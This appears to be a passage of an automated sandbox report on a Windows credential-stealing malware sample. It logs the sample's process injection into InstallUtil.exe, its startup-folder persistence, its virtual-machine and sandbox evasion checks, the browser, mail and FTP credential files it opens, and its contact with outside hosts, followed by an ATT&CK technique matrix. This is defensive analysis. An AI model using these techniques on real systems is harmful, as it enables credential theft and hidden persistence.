                      Source: C:\Users\user\Desktop\Ref#60031796.exe Code function: 0_2_06F459D3 push cs; retf 0_2_06F459D6
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Code function: 0_2_06F753DB push es; retf 0_2_06F753DC
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Code function: 0_2_06F7D9CF push esi; iretd 0_2_06F7D9E5
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Code function: 0_2_06FD6B28 push FFFFFF8Bh; iretd 0_2_06FD6B2F
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Code function: 0_2_06FD0006 push eax; iretd 0_2_06FD0031
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Code function: 0_2_06FD69EC push FFFFFF8Bh; ret 0_2_06FD69F0
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Code function: 0_2_06FD69B4 push FFFFFF8Bh; ret 0_2_06FD69B6
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Code function: 0_2_0707B6C3 push cs; ret 0_2_0707B6C9
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Code function: 0_2_07148998 push eax; ret 0_2_07148999
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Code function: 0_2_07149800 pushfd ; retf 0_2_07149801
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_00CF0434 push ebx; retf 0000h 3_2_00CF0462
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_00CF0C45 push ebx; retf 3_2_00CF0C52
                      Source: C:\Users\user\Desktop\Ref#60031796.exe File created: C:\Users\user\AppData\Roaming\vdvfyt.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\Ref#60031796.exe File created (dropped file): C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                      Source: C:\Users\user\Desktop\Ref#60031796.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: Ref#60031796.exe PID: 1012, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Memory allocated: 11E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Memory allocated: 2BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Memory allocated: 4BB0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: CF0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2860000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4860000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory allocated: 2F10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory allocated: 3140000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory allocated: 2F40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Window / User API: threadDelayed 2807
                      Source: C:\Users\user\Desktop\Ref#60031796.exe Window / User API: threadDelayed 7020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2035
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5033
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Window / User API: threadDelayed 7361
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Window / User API: threadDelayed 2430
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928 Thread sleep count: 35 > 30
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928 Thread sleep time: -32281802128991695s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 6448 Thread sleep count: 2807 > 30
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 6448 Thread sleep count: 7020 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060 Thread sleep time: -25825441703193356s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 524 Thread sleep count: 2035 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 524 Thread sleep count: 5033 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756 Thread sleep count: 37 > 30
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756 Thread sleep time: -34126476536362649s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5112 Thread sleep count: 7361 > 30
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5112 Thread sleep count: 2430 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96479Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96274Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96143Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96005Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99641Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99531Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99313Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99203Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99094Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98985Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98874Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98542Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98430Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98313Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98202Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98094Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97844Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97703Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97594Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97484Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97360Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97140Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96922Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96813Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96703Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96594Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96485Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96360Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96235Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96110Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95985Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95860Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95735Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95610Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95485Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95360Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95235Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95110Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94985Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94860Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94735Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94610Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94485Jump to behavior
                      Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exe - File opened: C:\Users\user\AppData\
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: wscript.exe, 00000004.00000002.2457296736.000001A090784000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: vdvfyt.exe, 00000005.00000002.3359423857.000000000135B000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: model0Microsoft|VMWare|Virtual
                      Source: wscript.exe, 00000004.00000002.2457296736.000001A090784000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                      Source: Ref#60031796.exe, 00000000.00000002.2345387570.0000000000D92000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: InstallUtil.exe, 00000003.00000002.3367500140.0000000005252000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7F5008
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\wscript.exe - Process created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe"
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Queries volume information: C:\Users\user\Desktop\Ref#60031796.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe - Queries volume information: C:\Users\user\AppData\Roaming\vdvfyt.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#60031796.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match - File source: dump.pcap, type: PCAP
                      Source: Yara match - File source: 0.2.Ref#60031796.exe.3bce418.4.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000003.00000002.3361572023.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000003.00000002.3361572023.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000003.00000002.3361572023.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: Process Memory Space: Ref#60031796.exe PID: 1012, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: InstallUtil.exe PID: 5716, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara match - File source: 0.2.Ref#60031796.exe.3bce418.4.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000003.00000002.3361572023.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: Process Memory Space: Ref#60031796.exe PID: 1012, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: InstallUtil.exe PID: 5716, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match - File source: dump.pcap, type: PCAP
                      Source: Yara match - File source: 0.2.Ref#60031796.exe.3bce418.4.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000003.00000002.3361572023.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000003.00000002.3361572023.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000003.00000002.3361572023.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: Process Memory Space: Ref#60031796.exe PID: 1012, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: InstallUtil.exe PID: 5716, type: MEMORYSTR
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | 111 Scripting | Valid Accounts | 121 Windows Management Instrumentation | 111 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | 2 Registry Run Keys / Startup Folder | 2 Registry Run Keys / Startup Folder | 2 Obfuscated Files or Information | 1 Credentials in Registry | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 211 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      [Behavior graph (image not preserved)] Behavior Graph ID: 1567429; Sample: Ref#60031796.exe; Startdate: 03/12/2024; Architecture: WINDOWS; Score: 100
                      Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
                      Sample-level DNS/IP: oshi.at; api.ipify.org
                      Process: Ref#60031796.exe (started)
                        DNS/IP: oshi.at 194.15.112.248, 443, 49715 INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB Ukraine
                        Dropped: C:\Users\user\AppData\Roaming\vdvfyt.exe, PE32
                        Dropped: C:\Users\user\...\vdvfyt.exe:Zone.Identifier, ASCII
                        Dropped: C:\Users\user\AppData\Roaming\...\vdvfyt.vbs, ASCII
